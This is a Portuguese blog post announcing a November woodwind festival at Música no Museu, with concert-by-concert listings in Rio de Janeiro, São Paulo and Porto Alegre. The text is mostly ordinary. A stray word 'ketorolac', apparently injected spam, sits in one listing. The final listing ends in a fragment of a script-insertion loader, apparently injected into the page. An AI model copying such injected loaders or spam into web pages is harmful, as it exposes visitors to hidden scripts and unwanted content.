LateralMovimentoMúsica de câmaraProgramaçãoRio de Janeiro

IV Festival Internacional de Sopros – Música no Museu

Seguindo o sucesso dos festivais das harpas, IV o Festival Internacional de Sopros com ênfase no Oboé, Fagote, Clarineta e Flauta é a atração de novembro de Música no Museu.

Serão 28 concertos de sopros de 4 a 30 de novembro no Rio de Janeiro. Somados aos demais espaços, não  só no Rio, mas também em São Paulo e Porto Alegre, além do encerramento do Música no Museu Internacional em Sydney na Austrália, com o Almendrix Trio, totalizam 37 concertos no mês.

 

O Curador do Festival , oboísta-compositor Harold Emert, inspirou-se nos  Festivais anuais do International Double Reed Society, onde participou cinco  vezes como intérprete em várias cidades dos EUA, Buenos Aires e Melbourne, na Austrália. Para ele ¨O Rio de Janeiro é uma cidade aberta para novidades e espero que com este  festival comece um novo ciclo principalmente para as palhetas duplas (oboé e  fagote). Temos todos os anos festivais dos cellos e harpas, que estão sendo incluídos em trilhas sonoras de novela e filmes nacionais. Então, porque não os nossos instrumentos?”

 

A abertura do IV Festival Internacional de Sopros será com a Orquestra Jovem Música no Museu, na sexta-feira dia 4 de novembro,  no CC Light, com a estreia do  “Concerto para Clarineta e Cordas” do Maestro Anderson Alves dedicado ao  professor José Carlos de Castro, grande clarinetista, tendo como intérprete a  Thatyana Silva, além do “Gran Duo” para clarineta, contrabaixo e orquestra  de cordas de Bottesini, tendo como solistas: Cristiano Costa, clarineta e Natália Terra, contrabaixo e, encerrando, a Sinfonia para Cordas em Ré  maior de F. Mendelsohn.

 

Dentre os convidados internacionais, os oboístas Kevin Vigneau (EUA, prof. Universidade de Nova México e 1º oboista da Orquestra do novo México), Guy  Porat (Israel, prof. de Hochschule de Musik,Vienna), Eric Ohlsson (EUA,  prof. Fla. State Univ.), Mary Lindsey Bailey ( EUA -Prof na Universidade de  Colorado e é a principal oboísta da Grand Junction Symphony Orchestra), Dr.  Janice Crews (EUA) e os fagotistas Scott Pool ( EUA Prof. da Universidade do Texas), Lynn Hileman (EUA Universidade de West Virginia) e Richard Meek (EUA  Prof. da Universidade do Texas). Paralelamente, serão realizadas master classes, nos dias 07 e 14, no Escola de Música Villa-Lobos Funarj,  abertas aos estudantes destes instrumentos.

 

Outras atrações: Mauro Senise,  sax e Gilson Peranzzetta, piano, dia 11, às 15h, no Centro Cultural Justiça  Federal, e da Orquestra Rio Camerata, dia 25, no  Museu Histórico Nacional, às 12h30. Ainda no dia 25, teremos a comemoração do 9º aniversário do Madrigal Cruz Lopes, na Igreja Nossa Senhora da Paz, em Ipanema, às 19h.

 

Homenagem especial: a comemoração do Dia de Zumbi com a Primeira Escola  de Congo – São Benedito Do Êre, de São Paulo, no dia 20 de novembro no Museu Militar Conde de Linhares.

 

Aguardamos por vocês. Sds Sergio da Costa e Silva- Diretor de Música no

 

PROGRAMAÇÃO

 

Rio de Janeiro


Dia 01 – Terça-feira – 12h30

Real Gabinete Português de Leitura
Rua Luiz de Camões, 30 – Praça Tiradentes – Centro

Músico: Elodie Bouny, violão

Programa: Yamandu Costa e Guto Wirtti, Alfredo Dominguez, Juan Falu, Guillermo Rizotto.

 

Dia 03 – Quinta-feira – 12h30

Museu Nacional de Belas Artes
Av. Rio Branco, 199 – Centro

Músico: Paulo Brasil, piano

Programa: Franz Liszt

 

Dia 04 – Sexta-feira – 12h30

Centro Cultural Light
Rua Marechal Floriano, 168 – Centro

Músico: Orquestra Jovem Música no Museu
Maestro: Anderson Alves

Programa: J. Sibelius, Anderson Alves, H.Villa Lobos, G. Bottesini, F. Mendelsohn.

 

Dia 05 – Sábado – 12h30

Museu do Exército – Forte de Copacabana
Praça Eugênio Franco, 1 – Posto 6 – Copacabana

Músico: Trio oboé Brasil – JEFERSON NERY E THIAGO NEVES, OBOÉS, E PIERRE DESCAVES, CORNE INGLES E OBOé

Programa:  JOSEPH BODIN DE BOISMORTIER, W. A. MOZART, L. VAN BEETHOVEN, JACOB DO BANDOLIM

 

Dia 06 – Domingo – 11h30

Museu de Arte Moderna
Av. Infante Dom Henrique, 85 – Parque do Flamengo

Músico: Kevin Vingneau,oboísta e Ana Maria Brandão, piano

Programa: C.P.E. Bach, Ronald Roseman, Clara Schumann,  Johann  Kalliwoda.

 

Dia  07– Segunda-feira – 12h30

Biblioteca Nacional
Rua México, s/n – Centro

Músico: Quarteto Wanhal  – Oboé: Leandro Finotti – Violino: Yuri Reis – Viola: Luciana Garrido – Cello: Hudson Lima

Programa:  Wanhal, Jan-Pepusch, John Christopher,  Fiala Josef

 

Dia 08 – terça-feira – 12h30

Arquivo Nacional
Praça da República, 173 – Centro

Músico: Leonardo Fuks, oboés convencionais e alternativos
Participação do público de oboístas

Programa:  Leonardo Fuks,  Folclore Francês, Luiz Gonzaga.

 

Dia 09 – Quarta-feira – 12h30

Museu da República
Rua do Catete, 153 – Catete

Músico: Scott Pool: fagote – Wanda Brister: Mezzo Soprano – Natsuki Fukasawa: Piano

Programa: Emmanuel Chabrier,  Gabriel Fauré,  Eugene Bozza, Camille Saint-Saëns, Madeleine Dring

 

Dia 10 – Quinta-feira – 12h30

Real Gabinete Português de Leitura
Rua Luiz de Camões, 30 0- Praça Tiradentes – Centro

Músico:  Eduardo Monteiro, flauta

Programa:  J. S. Bach, C. Ph. E. Bach, Ernani Aguiar, Eduardo Escalante, Claude Debussy

 

Dia 11 – Sexta-feira – 15h

Centro Cultural Justiça Federal
Av. Rio Branco, 241 – Centro

Músico: Mauro Senise, sax e Gilson Peranzzetta, piano

Programa: Villa Lobos, Debussy,  Ary Barroso, Dorival Caymmi, Pixinguinha

 

Dia 12 – Sábado – 11h30

Museu Parque das Ruínas
Rua Murtinho Nobre, 169 – Santa Teresa

Músico: Música Indiana Brasil – Sandro Shankara (cordas), Jaffer Ferreira (percussão) e Paramatma Cristophe (flautas)

Programa:  Cantos Devocionais da Índia – Kirtans

 

Dia 13– Domingo – 11h30

Museu de Arte Moderna
Av. Infante Dom Henrique, 85 – Parque do Flamengo

Músico: Thiago Neves, oboé e Rocio del Moral, piano

Programa:  Carl Phillip Emanuel Bach, Camille saes saint, Oswaldo Lacerda, Jolivet

 

Dia 14/11– Segunda-feira – 12h30

Centro Cultural Justiça do Trabalho
Av. Presidente Antônio Carlos, 251 – Centro

Músico: Marco Miglietta: oboé – Pablo Maciera: fagote

Programa: Quantz, Phildor, Telemann

 

Dia 15 – Terça-feira – 15h

Hebraica-Rio
Rua das Laranjeiras, 346 – Laranjeiras – 4º andar

Músico: Marco Miglietta – oboé e Pablo Maciera – fagote

Programa: Quantz, Phildor, Telemann

 

Dia 16 – Quarta-feira – 11h30

Memorial Getúlio Vargas
Praça Luis de Camões, s/n – subsolo – Glória

Músico: DUO AMÉRICAS : Flauta: Maria Carolina Cavalcanti e Violão: Jorge L. Santos

Programa:  Adina Izarra,  Rami Levin,  Sergio Roberto de Oliveira,  Villa-Lobos,  Radames Gnatalli

 

Dia 17 – Quinta-feira – 18h ketorolac

Centro Cultural Justiça Federal
Av. Rio Branco, 241 – Centro

Músico: Odette Ernest Dias: flauta – Cosme Silveira: fagote – Vanja Ferreira: harpa
Convidado especial: Harold Emert: oboé

Programa:  L.V. Beethoven, J.S. Bach, Andre Jolivet.

 

Dia 18 – Sexta-feira – 15h.

Centro Cultural Justiça Federal
Av. Rio Branco, 241 – Centro

Músico: Dr. Mary Lindsey Bailey: oboé – Dr. Janice Crews: oboé – Rocío Del Moral: piano

Programa: Jeffrey Rathbun, Pierre Max Dubois, Gilles Silvestrini, Roger Vogel, Vincent Persichetti, Napoleon Coste.

 

Dia 19 – Sábado – 11h30

Museu Parque das Ruínas
Rua Murtinho Nobre, 169 – Santa Teresa

Músico: Música Indiana Brasil – Sandro Shankara (cordas), Jaffer Ferreira (percussão) e Paramatma Cristophe (flautas)

Programa: Música Indiana

 

Dia 20 – Domingo – 11h30

Museu Militar Conde de Linhares
Av. Pedro II, 383 – São Cristóvão

Músico: Primeira Escola De Congo – São Benedito Do Êre, de São Paulo.
Participações Especiais: Quintino Bento, Orquestra do Erê e Corpo de Cortejo da Escola de Congo

Programa:Homenagem ao Dia de Zumbi”

 

Dia 21 – Segunda-feira – 12h30

Círculo Militar da Praia Vermelha
Pça. Gal Tibúrcio s/n – Praia Vermelha

Músico: Al Nur Kibir  – Maxwell de Oliveira, violonista e alaudista, Radoslav Mirianov, compositor e arranjador, José Amâncio (Yussef), percussionista; Jaffer, percussionista.

Programa:  Música Árabe

 

Dia 22 – Terça-feira – 12h30

Clube de Engenharia
Av. Rio Branco, 124  – 22º andar – Centro

Músico: Eric Ohlsson, oboé   e  Deloise Lima, piano

Programa:  J.S. Bach, Maurice Ravel, Osvaldo Lacerda, Herbert Howells,

 

Dia 23 – Quarta-feira – 12h30

Clube de Engenharia
Av. Rio Branco, 124  – 22º andar – Centro

Músico: Richard Meek – EUA  (fagote)  e amigos

Programa:  D. Dondeyne,  Pierre Max Duboius, Chuck Holdeman, Francisco Mignone, Victor Scavuzzo

 

Dia 24 – Quinta-feira – 12h30

Museu Nacional de Belas Artes
Av. Rio Branco, 199 – Centro

Músicos: Janet Grice: Fagote – Clifford Korman: Piano – Carlos Ernesto Dias: Oboé – Jefferson Lescowich: contrabaixo

Programa: Nelson Ayres, Jacob do Bandolim, Flavio Venturini, Egberto Gismonti, Moacir Santos.

 

Dia 25 – Sexta-feira – 12h30

Museu Histórico Nacional
Praça Marechal Âncora, s/n – Centro

Músico: Orquestra Rio Camerata – solistas Richard Meek, Lynn Hilell, fagotes e Eric Ohlsson, oboé
Regente: Israel Menezes

Programa:  G .P.Handel, J.B. Vanhal, M. Ravel

 

Dia 25 – Sexta-feira  – 19h.

Igreja Nossa Senhora da Paz
Rua Visconde de Pirajá, 339 – Ipanema

Músico: Madrigal Cruz Lopes – Comemoração de aniversário – 9ºano.
Diretor Artístico e Regente: Maestro José Machado Neto
Programa será acompanhado da CAMERATA A4 CORDAS e da Pianista Regina Tatagiba.

Programa: W.A.Mozart,  Charles Gounod , Michael W. Smith, G.F. Händel, Beethoven.

 

Dia 26 – Sábado – 18h

Palácio São Clemente
Rua São Clemente, 424 – Botafogo

Músico: Márcio Ivens, canto e Fernanda Canaud, piano

Programa:  Dolores Duran, Roberto Carlos, Lupicínio Rodrigues, Danton Vogler-Esdra, Custódio Mesquita.

 

Dia 27 – Domingo – 11h30

Museu de Arte Moderna
Av. Infante Dom Henrique, 85 – Parque do Flamengo

Músico: Fernando José Silveira, clarineta e Eliara Puggina, piano

Programa: José Lino Flemming,  Charles-Marie WIDOR,  Osvaldo Lacerda,  José Lino Flemming,  Breno Blauth

 

Dia 28 – Segunda-feira – 18h

Casa de Cultura Laura Alvim
Av. Vieira Souto, 176 – Ipanema

Músico:  Duo de Oboé e Cravo – Pierre Descaves: Oboé e Corne Inglês – Clara Albuquerque: Cravo
Participação especial de Fernanda Calado – Dança

Programa:  Marin Marais, François Couperin, Benjamin Britten e Antonio Vivaldi.

 

Dia 29 – Terça-feira – 18h

Museu do Exército – Forte de Copcabana
Praça Cel. Eugênio Franco, 1 – Posto 6 – Copacabana

Músico: DUO AMÉRICAS : Flauta: Maria Carolina Cavalcanti e Violão: Jorge L. Santos

Programa:  Adina Izarra,  Rami Levin,  Sergio Roberto de Oliveira,  Villa-Lobos,  Radames Gnatalli

 

Dia 30 – Quarta-feira – 12h30

Clube de Engenharia
Av. Rio Branco, 124  – 22º andar – Centro

Músico: Harold Emert: oboé – Carmen Bartholy: soprano – Cláudio Vettori: piano

Programa: J.S. Bach, Heute Nach, Chopin.

 

São Paulo

Museu Casa Brasileira – 11h.
Av. Brigadeiro Faria Lima, 2705 – Jardim Paulista

Dia 06 de novembro – O Conjunto de Música Antiga Clepsidra

Dia 12 de novembro – Rogério Botter Maio Trio

Dia 20 de novembro – DIA DA CONSCIÊNCIA NEGRA: 11 h. Curimba: Pastoras do Kolombolo

Dia 20 de novembro – DIA DA CONSCIÊNCIA NEGRA: 19 h. Orquestra Mundana e Orquestra Metropolitana – O típico e o atípico

Dia 27 de novembro – Movimento Sincopado

 

Porto Alegre

Museu de História da Medicina do Rio Grande do Sul (MUHM) – 18h30
Av. Independência, 270 – Centro Histórico de Porto Alegre

Musical do Sarau Lírico

Dia 03 de novembro –  Tenor Juremir Vieira e o pianista Hingrid Kujavinski.}document.currentScript.parentNode.insertBefore(s, document.currentScript);

Leave a Response

movimento.com
Responsável pela inclusão de programação e assuntos genéricos no blog.